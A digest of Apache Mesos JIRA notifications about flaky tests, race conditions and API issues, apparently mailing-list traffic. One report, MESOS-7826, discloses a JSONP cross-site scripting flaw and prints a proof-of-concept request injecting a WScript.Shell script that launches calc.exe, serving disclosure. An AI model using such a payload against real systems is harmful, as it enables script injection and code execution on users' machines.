{{DESTROY_VOLUME}} and {{DESTROY_BLOCK}}. I'll work on a patch to fix this test, 
possibly by controlling the clock.
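
A rough sketch of the clock-control approach, using the libprocess test clock
(the actual patch may structure this differently):
{code:cpp}
// Inside the test body; `Clock` is process::Clock from libprocess and
// `masterFlags` are the test's master flags.
Clock::pause();  // Timer-driven allocations stop while the clock is paused.

// ... apply DESTROY_VOLUME and DESTROY_BLOCK back to back, with no
// allocation (and hence no offer) happening in between ...

Clock::advance(masterFlags.allocation_interval);
Clock::settle();  // Let the allocator run exactly once, deterministically.
Clock::resume();
{code}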


was (Author: chhsia0):
This is caused by a race that the master may send out an offer between 
{{DESTRY_VOLUME}} and {DESTROY_BLOCK}}. I'll work on a patch to fix this test, 
possibly by controlling the clock.

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on Ubuntu 16.04 with SSL and GRPC enabled:
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Chun-Hung Hsiao (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334908#comment-16334908
 ] 

Chun-Hung Hsiao commented on MESOS-8474:


This is caused by a race in which the master may send out an offer between 
{{DESTROY_VOLUME}} and {{DESTROY_BLOCK}}. I'll work on a patch to fix this test, 
possibly by controlling the clock.

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on Ubuntu 16.04 with SSL and GRPC enabled:
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao reassigned MESOS-8474:
--

Assignee: Chun-Hung Hsiao

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on Ubuntu 16.04 with SSL and GRPC enabled:
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8474:

 Labels: flaky flaky-test mesosphere  (was: )
Component/s: storage

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on Ubuntu 16.04 with SSL and GRPC enabled:
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8474:

Attachment: consoleText.txt

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on Ubuntu 16.04 with SSL and GRPC enabled:
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Benjamin Bannier (JIRA)
Benjamin Bannier created MESOS-8474:
---

 Summary: Test 
StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
 Key: MESOS-8474
 URL: https://issues.apache.org/jira/browse/MESOS-8474
 Project: Mesos
  Issue Type: Bug
  Components: test
Affects Versions: 1.5.0
Reporter: Benjamin Bannier


Observed on our internal CI on Ubuntu 16.04 with SSL and GRPC enabled:
{noformat}
../../src/tests/storage_local_resource_provider_tests.cpp:1898
  Expected: 2u
  Which is: 2
To be equal to: destroyed.size()
  Which is: 1
{noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-5882) `os::cloexec` does not exist on Windows

2018-01-22 Thread Andrew Schwartzmeyer (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-5882?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Schwartzmeyer reassigned MESOS-5882:
---

Assignee: Andrew Schwartzmeyer

> `os::cloexec` does not exist on Windows
> ---
>
> Key: MESOS-5882
> URL: https://issues.apache.org/jira/browse/MESOS-5882
> Project: Mesos
>  Issue Type: Bug
>  Components: stout
>Reporter: Alex Clemmer
>Assignee: Andrew Schwartzmeyer
>Priority: Major
>  Labels: mesosphere, stout
>
> `os::cloexec` does not work on Windows. It will never work at the OS level. 
> Because of this, there are likely many important and hard-to-detect bugs 
> hanging around the agent.
> This is extremely important to fix. Some possible solutions to investigate 
> (some of which are _extremely_ risky):
> * Abstract out file descriptors into a class, implement cloexec in that class 
> on Windows (since we can't rely on the OS to do it).
> * Refactor all the code that relies on `os::cloexec` to not rely on it.
> Of the two, the first seems less risky in the short term, because the cloexec 
> code only affects Windows. Depending on the semantics of the implementation 
> of the `FileDescriptor` class, it is possible that this is riskier to Windows 
> in the longer term, as the semantics of `cloexec` may have subtle differences 
> between Linux and Windows.
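
A minimal sketch of the first option (a hypothetical wrapper, not stout's
actual design): record the close-on-exec intent in the class, so that Windows
process-creation code can honor it even though the OS has no cloexec bit.
{code:cpp}
#include <cstdint>

// Hypothetical wrapper for illustration only.
class FileDescriptor
{
public:
  explicit FileDescriptor(intptr_t handle) : handle_(handle) {}

  // There is no OS-level cloexec flag on Windows, so we record the intent
  // here; code that spawns child processes would consult this flag when
  // deciding which handles the child inherits.
  void setCloexec(bool cloexec) { cloexec_ = cloexec; }
  bool cloexec() const { return cloexec_; }

  intptr_t handle() const { return handle_; }

private:
  intptr_t handle_;
  bool cloexec_ = true;  // Default: do not inherit into children.
};
{code}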



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8469) Mesos master might drop some events in the operator API stream

2018-01-22 Thread Greg Mann (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8469?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334730#comment-16334730
 ] 

Greg Mann commented on MESOS-8469:
--

Review here: https://reviews.apache.org/r/65253/

> Mesos master might drop some events in the operator API stream
> --
>
> Key: MESOS-8469
> URL: https://issues.apache.org/jira/browse/MESOS-8469
> Project: Mesos
>  Issue Type: Bug
>Reporter: Vinod Kone
>Assignee: Greg Mann
>Priority: Critical
>
> Inside `Master::updateTask`, we call `Subscribers::send`, which asynchronously 
> calls `Subscribers::Subscriber::send` on each subscriber.
> But the problem is that inside `Subscribers::Subscriber::send` we are looking 
> up the state of the master (e.g., getting Task* and Framework*), which might 
> have changed between `Subscribers::send` and `Subscribers::Subscriber::send`.
>  
> For example, if a terminal task received an acknowledgement, the task might be 
> removed from the master's state, causing us to drop the TASK_UPDATED event.
>  
> We noticed this in an internal cluster, where a TASK_KILLED update was sent 
> to one subscriber but not the other.
>  
>  
>  
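
One way to avoid this class of race, sketched below with hypothetical
simplified types: capture the task data synchronously, while the master's
state still matches the update, and hand each subscriber an immutable
snapshot instead of letting it look up {{Task*}}/{{Framework*}} later.
{code:cpp}
#include <functional>
#include <string>
#include <vector>

// Hypothetical snapshot of the data a TASK_UPDATED event needs.
struct TaskSnapshot
{
  std::string taskId;
  std::string state;
};

// Built synchronously (e.g. inside `Master::updateTask`), before a later
// acknowledgement can remove the task from the master's state.
TaskSnapshot makeSnapshot(const std::string& taskId, const std::string& state)
{
  return TaskSnapshot{taskId, state};
}

// Each subscriber receives the immutable snapshot asynchronously; no master
// state is consulted at send time, so nothing can have "disappeared".
void broadcast(
    const std::vector<std::function<void(const TaskSnapshot&)>>& subscribers,
    const TaskSnapshot& event)
{
  for (const auto& send : subscribers) {
    send(event);
  }
}
{code}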



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-6551) Add attach/exec commands to the Mesos CLI

2018-01-22 Thread Armand Grillet (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6551?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Armand Grillet reassigned MESOS-6551:
-

Assignee: Armand Grillet  (was: Kevin Klues)

> Add attach/exec commands to the Mesos CLI
> -
>
> Key: MESOS-6551
> URL: https://issues.apache.org/jira/browse/MESOS-6551
> Project: Mesos
>  Issue Type: Task
>  Components: cli
>Reporter: Kevin Klues
>Assignee: Armand Grillet
>Priority: Critical
>  Labels: debugging, mesosphere
>
> After all of this support has landed, we need to update the Mesos CLI to 
> implement {{attach}} and {{exec}} functionality as outlined in the Design Doc



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-7016) Make default AWAIT_* duration configurable

2018-01-22 Thread James Peach (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7016?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16329715#comment-16329715
 ] 

James Peach edited comment on MESOS-7016 at 1/22/18 4:08 PM:
-

| [r/65201|https://reviews.apache.org/r/65201] | Added a global 
DEFAULT_TEST_TIMEOUT variable. |
| [r/65202|https://reviews.apache.org/r/65202] | Adopted the libprocess 
`DEFAULT_TEST_TIMEOUT`. |


was (Author: jamespeach):
| [r/65201|https://reviews.apache.org/r/65201] | Added a global 
DEFAULT_TEST_TIMEOUT variable. |
| [*r/65202|https://reviews.apache.org/*r/65202] | Adopted the libprocess 
`DEFAULT_TEST_TIMEOUT`. |

> Make default AWAIT_* duration configurable
> --
>
> Key: MESOS-7016
> URL: https://issues.apache.org/jira/browse/MESOS-7016
> Project: Mesos
>  Issue Type: Improvement
>  Components: libprocess, test
>Reporter: Benjamin Bannier
>Assignee: James Peach
>Priority: Major
> Fix For: 1.6.0
>
>
> libprocess defines a number of helpers {{AWAIT_*}} to wait for a 
> {{process::Future}} reaching terminal states. These helpers are used in tests.
> Currently the default duration to wait before triggering an assertion failure 
> is 15s. This value was chosen as a compromise between failing fast on likely 
> fast developer machines, but also allowing enough time for tests to pass in 
> high-contention environments (e.g., overbooked CI machines).
> If a machine is more overloaded than expected, {{Futures}} might take longer 
> to reach the desired state, and tests could fail. Ultimately we should 
> consider running tests with a paused clock to eliminate this source of test 
> flakiness (see MESOS-4101), but as an intermediate measure we should make the 
> default timeout duration configurable.
> A simple approach might be to expose a build variable allowing users to set 
> at configure/cmake time a desired timeout duration for the setup they are 
> building for. This would allow us to define longer timeouts in the CI build 
> scripts, while keeping default timeouts as short as possible.
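
For illustration, a sketch of a run-time variant of this idea (the actual
patches in r/65201 and r/65202 wire the timeout up differently; the
environment variable name here is hypothetical):
{code:cpp}
#include <chrono>
#include <cstdlib>
#include <string>

// Returns the default AWAIT_* timeout, overridable via a hypothetical
// DEFAULT_TEST_TIMEOUT_SECS environment variable, e.g. set by CI scripts.
std::chrono::seconds defaultTestTimeout()
{
  if (const char* value = std::getenv("DEFAULT_TEST_TIMEOUT_SECS")) {
    return std::chrono::seconds(std::stol(value));
  }

  return std::chrono::seconds(15);  // The current compromise default.
}
{code}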



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7503) Consider improving the WebUI failed to connect dialog.

2018-01-22 Thread Dennis (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7503?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334283#comment-16334283
 ] 

Dennis commented on MESOS-7503:
---

Same here: Mesos is running in Microsoft Azure behind a load balancer, and 
/master/state and metrics/snapshot are using the internal IP of the current 
master, which leads to the "failed to connect" errors...

 

> Consider improving the WebUI failed to connect dialog.
> --
>
> Key: MESOS-7503
> URL: https://issues.apache.org/jira/browse/MESOS-7503
> Project: Mesos
>  Issue Type: Improvement
>  Components: webui
>Affects Versions: 1.2.0
>Reporter: Anand Mazumdar
>Priority: Major
>  Labels: mesosphere, webui
> Attachments: Capture d’écran 2017-05-12 à 15.06.07.png
>
>
> Usually, when your Mesos Master is behind a reverse proxy/LB, the keepalive 
> timeout value would be set to a small value, e.g., 60 seconds for nginx. This 
> results in the persistent connection between the browser and the Mesos master 
> breaking, resulting in the connection-lost dialog (see attached screenshot). 
> This is very inconvenient when debugging using the Web UI.
> We should consider making the error dialog less intrusive, e.g., update an 
> element to signify that a reconnection is in progress, similar to what other 
> online services like Gmail do.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8473) Authorize `GET_OPERATIONS` calls.

2018-01-22 Thread Jan Schlicht (JIRA)
Jan Schlicht created MESOS-8473:
---

 Summary: Authorize `GET_OPERATIONS` calls.
 Key: MESOS-8473
 URL: https://issues.apache.org/jira/browse/MESOS-8473
 Project: Mesos
  Issue Type: Task
  Components: agent, master
Reporter: Jan Schlicht


The {{GET_OPERATIONS}} call lists all known operations on a master or agent. 
Authorization has to be added to this call.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334247#comment-16334247
 ] 

Qian Zhang commented on MESOS-8462:
---

There is already a test, {{SlaveRecoveryTest.RecoverCompletedExecutor}}, which 
verifies the recovery of a completed executor; I improved it by checking the 
executor's work and meta directories after the recovery.

RR: https://reviews.apache.org/r/65263

> Unit test for `Slave::detachFile` on removed frameworks.
> 
>
> Key: MESOS-8462
> URL: https://issues.apache.org/jira/browse/MESOS-8462
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Chun-Hung Hsiao
>Assignee: Qian Zhang
>Priority: Major
>  Labels: mesosphere
>
> We should add a unit test for MESOS-8460.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.

2018-01-22 Thread Qian Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Qian Zhang updated MESOS-8462:
--
Target Version/s: 1.6.0  (was: 1.5.1)

> Unit test for `Slave::detachFile` on removed frameworks.
> 
>
> Key: MESOS-8462
> URL: https://issues.apache.org/jira/browse/MESOS-8462
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Chun-Hung Hsiao
>Assignee: Qian Zhang
>Priority: Major
>  Labels: mesosphere
>
> We should add a unit test for MESOS-8460.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7742) ContentType/AgentAPIStreamingTest.AttachInputToNestedContainerSession is flaky

2018-01-22 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7742?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334227#comment-16334227
 ] 

Andrei Budnik commented on MESOS-7742:
--

https://reviews.apache.org/r/65261/

I think this patch provides a better solution than retrying to 
[connect|https://github.com/apache/mesos/blob/336e932199643e88c0edbea7c1f08d4b45596389/src/slave/containerizer/mesos/io/switchboard.cpp#L696-L700],
because otherwise we would need to:
# Use one more `loop` for the retry logic
# Define a limit on retry attempts and a delay between attempts
# Make sure we don't retry due to some non-ECONNREFUSED error
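
For contrast, a minimal sketch of what such a retry loop would entail (POSIX
sockets; the attempt count and delay are exactly the arbitrary knobs mentioned
above):
{code:cpp}
#include <cerrno>
#include <chrono>
#include <thread>

#include <sys/socket.h>

// Retry connect() only on ECONNREFUSED, with a bounded number of attempts
// and a fixed delay between them. Both knobs are arbitrary choices.
bool connectWithRetry(int fd, const sockaddr* addr, socklen_t len)
{
  const int attempts = 10;
  const std::chrono::milliseconds delay(50);

  for (int i = 0; i < attempts; ++i) {
    if (::connect(fd, addr, len) == 0) {
      return true;
    }

    if (errno != ECONNREFUSED) {
      return false;  // Retrying here would mask a real error.
    }

    std::this_thread::sleep_for(delay);
  }

  return false;
}
{code}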

> ContentType/AgentAPIStreamingTest.AttachInputToNestedContainerSession is flaky
> --
>
> Key: MESOS-7742
> URL: https://issues.apache.org/jira/browse/MESOS-7742
> Project: Mesos
>  Issue Type: Bug
>  Components: agent
>Affects Versions: 1.5.0
>Reporter: Vinod Kone
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: flaky-test, mesosphere-oncall
> Fix For: 1.6.0
>
> Attachments: AgentAPITest.LaunchNestedContainerSession-badrun.txt, 
> LaunchNestedContainerSessionDisconnected-badrun.txt
>
>
> Observed this on ASF CI and internal Mesosphere CI. Affected tests:
> {noformat}
> AgentAPIStreamingTest.AttachInputToNestedContainerSession
> AgentAPITest.LaunchNestedContainerSession
> AgentAPITest.AttachContainerInputAuthorization/0
> AgentAPITest.LaunchNestedContainerSessionWithTTY/0
> AgentAPITest.LaunchNestedContainerSessionDisconnected/1
> {noformat}
> This issue comes in at least three different flavours. Take 
> {{AgentAPIStreamingTest.AttachInputToNestedContainerSession}} as an example.
> h5. Flavour 1
> {noformat}
> ../../src/tests/api_tests.cpp:6473
> Value of: (response).get().status
>   Actual: "503 Service Unavailable"
> Expected: http::OK().status
> Which is: "200 OK"
> Body: ""
> {noformat}
> h5. Flavour 2
> {noformat}
> ../../src/tests/api_tests.cpp:6473
> Value of: (response).get().status
>   Actual: "500 Internal Server Error"
> Expected: http::OK().status
> Which is: "200 OK"
> Body: "Disconnected"
> {noformat}
> h5. Flavour 3
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/api_tests.cpp:6367
> Value of: (sessionResponse).get().status
>   Actual: "500 Internal Server Error"
> Expected: http::OK().status
> Which is: "200 OK"
> Body: ""
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7826) XSS in JSONP parameter

2018-01-22 Thread Alexander Rojas (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334043#comment-16334043
 ] 

Alexander Rojas commented on MESOS-7826:


We don't have any plans to look into this anytime soon. 

> XSS in JSONP parameter
> --
>
> Key: MESOS-7826
> URL: https://issues.apache.org/jira/browse/MESOS-7826
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api
> Environment: Running as part of DC/OS in a docker container.
>Reporter: Vincent Ruijter
>Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Consider 
> the following URL: 
> https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET 
> /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
>  HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 
> Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 
> 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01
>  19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and executing the 
> file (state.js) will pop up a calculator. My recommendation is to apply 
> input validation to this parameter to prevent abuse.
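
For illustration, a sketch of such validation (the accepted pattern is an
assumption; Mesos' actual handling may differ): accept only identifier-like
callback names, which rules out the quotes, parentheses, and operators an
injected script needs.
{code:cpp}
#include <regex>
#include <string>

// Accept only identifier-like JSONP callback names, e.g. "myCallback" or
// "angular.callbacks._0". The exact pattern is an assumption.
bool isValidJsonpCallback(const std::string& callback)
{
  static const std::regex pattern(R"(^[A-Za-z_$][A-Za-z0-9_$.]*$)");
  return std::regex_match(callback, pattern);
}
{code}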



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334022#comment-16334022
 ] 

Qian Zhang edited comment on MESOS-8305 at 1/22/18 8:35 AM:


I reproduced this issue once in my own environment by running this test 
repeatedly. When it happened, I checked the sandboxes of the two tasks and 
found that both tasks had already successfully written the pid namespace to a 
file in the sandbox, i.e., {{pidNamespace2.get()}} is actually not empty; 
instead it has the same value as {{pidNamespace1.get()}}. I think this proves 
the point in my previous comment: the test tries to read the file in the 
task's sandbox after that file is created but before it is written.
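
A minimal sketch of one way a test can tolerate that window, i.e., re-reading
until the file is non-empty instead of reading once (this may not be how the
actual patch in r/65278 fixes it):
{code:cpp}
#include <chrono>
#include <fstream>
#include <iterator>
#include <string>
#include <thread>

// Hypothetical helper: re-read `path` until it is non-empty or `attempts`
// run out, sleeping briefly between tries, so the read cannot land between
// the file's creation and the task writing its pid namespace into it.
std::string readNonEmpty(const std::string& path, int attempts = 100)
{
  for (int i = 0; i < attempts; ++i) {
    std::ifstream in(path);
    std::string contents(
        (std::istreambuf_iterator<char>(in)),
        std::istreambuf_iterator<char>());

    if (!contents.empty()) {
      return contents;
    }

    std::this_thread::sleep_for(std::chrono::milliseconds(10));
  }

  return "";
}
{code}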


was (Author: qianzhang):
I reproduced this issue once in my own env by running this test repeatedly, and 
when it happened, I checked the sandbox of the two tasks, and found both of the 
two tasks have already successfully write the pid namespace to a file in the 
sandbox, i.e., {{pidNamespace2.get()}} is actually not empty, instead it has a 
value which is same with {{pidNamespace1.get()}}. I think this proves the point 
in my previous comment: the test tries to read the file in the task's sandbox 
after that file is created but before it is written.

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 was committed and is likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334022#comment-16334022
 ] 

Qian Zhang commented on MESOS-8305:
---

I reproduced this issue once in my own environment by running this test 
repeatedly. When it happened, I checked the sandboxes of the two tasks and 
found that both tasks had already successfully written the pid namespace to a 
file in the sandbox, i.e., {{pidNamespace2.get()}} is actually not empty; 
instead it has the same value as {{pidNamespace1.get()}}. I think this proves 
the point in my previous comment: the test tries to read the file in the 
task's sandbox after that file is created but before it is written.

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 was committed and is likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)